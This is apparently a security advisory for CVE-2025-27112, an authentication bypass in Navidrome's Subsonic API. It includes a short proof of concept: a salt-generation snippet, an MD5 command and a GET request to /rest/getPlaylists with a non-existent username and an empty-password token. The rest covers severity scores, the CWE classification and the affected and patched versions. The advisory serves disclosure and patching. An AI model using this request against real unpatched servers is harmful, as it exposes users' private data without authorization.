In certain Subsonic API endpoints, authentication can be bypassed by using a non-existent username combined with an empty (salted) password hash. This allows read-only access to the server’s resources, though attempts at write operations fail with a “permission denied” error.
A flaw in the authentication check process allows an attacker to specify any arbitrary username that does not exist on the system, along with a salted hash of an empty password. Under these conditions, Navidrome treats the request as authenticated, granting access to various Subsonic endpoints without requiring valid credentials.
javascript
// e.g., salt = "x1vbudn1m6d"
Math.random().toString(36).substring(2, 15)
shell
# Using the example salt above
echo -n "x1vbudn1m6d" | md5sum
81f0c0fb5d202ab0d012e6eaeb722d79 -
GET https://[host]/rest/getPlaylists?u=FakeUser&t=81f0c0fb5d202ab0d012e6eaeb722d79&s=x1vbudn1m6d&v=1.16.1&c=castafiore&f=json
An attacker can use any non-existent username to bypass the authentication system and gain access to various read-only data in Navidrome, such as user playlists. However, any attempt to modify data fails due to insufficient permissions, limiting the impact to unauthorized viewing of information.
| Score | Percentile |
|---|---|
| 28.46% | 96.52% |
| Base score | Version | Severity | Vector |
|---|---|---|---|
| 6.9 | 4.0 | — |
|
| Type | Value |
|---|---|
| GHSA | GHSA-c3p4-vm8f-386p ↗ |
| CVE | CVE-2025-27112 ↗ |
| CWE id | Name |
|---|---|
| CWE-287 | Improper Authentication |
Vulnerable version ranges and first patched releases as published by GitHub.
| Ecosystem | Package | Vulnerable range | First patched | Vulnerable functions |
|---|---|---|---|---|
| go | github.com/navidrome/navidrome | >= 0.52.0, < 0.54.5 | 0.54.5 | — |